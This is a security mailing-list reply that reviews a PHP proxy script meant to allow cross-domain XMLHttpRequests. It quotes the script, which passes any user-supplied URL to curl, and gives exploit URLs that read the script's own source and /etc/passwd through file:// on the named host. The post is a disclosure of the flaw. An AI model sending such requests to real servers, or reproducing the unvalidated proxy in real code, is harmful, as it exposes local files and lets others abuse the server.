<<< Date Index >>>     <<< Thread Index >>>

Re: [Full-disclosure] Cross Domain XMLHttpRequest



Michal Majchrowicz wrote:
> Due to "security reasons" many Web Browsers doesn't allow cross
> domain XMLHttpRequests.

[..]

hi Michal, personally i don't get your point (to me it seems just
an hybrid implementation using both server side and client side
scripting) but i'm sure you can better explain your intents

from what i saw it asks a php page to make an http query to the foreign
domain and then display back the page contents using js

so i suppose this is not a vulnerability at all, just an implementation
to (??) pass to javascript remote contents fetched using a machine !=
from the client/browser/whenether

anyway your implementation is a bit flawed

http://sectroyer.110mb.com/myhttp.php?url=file://myhttp.php&method=get

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

<?php
if(isset($_GET['url'])==true)
{
$curl=curl_init();
curl_setopt($curl,CURLOPT_COOKIE,$_GET['cookie']);
curl_setopt($curl,CURLOPT_URL,rawurldecode($_GET['url']));
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
if(($_GET['method']=="post") && (isset($_GET['vars'])==true))
{
$vars=rawurldecode($_GET['vars']);
curl_setopt($curl,CURLOPT_POSTFIELDS,$vars);
}
$tmp=curl_exec($curl);
curl_close($curl);
echo "myglobalcallback(\"".rawurlencode($tmp)."\");";
}
?>

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

this is basically a proxy, it can make get/post requests to http
only hosts, saturate the server bandwidth *PLUS* naturally fetch any
local file : )

http://sectroyer.110mb.com/myhttp.php?url=file:///etc/passwd&method=get

please correct me if i misunderstood

best regards,
Francesco `ascii` Ongaro
http://www.ush.it/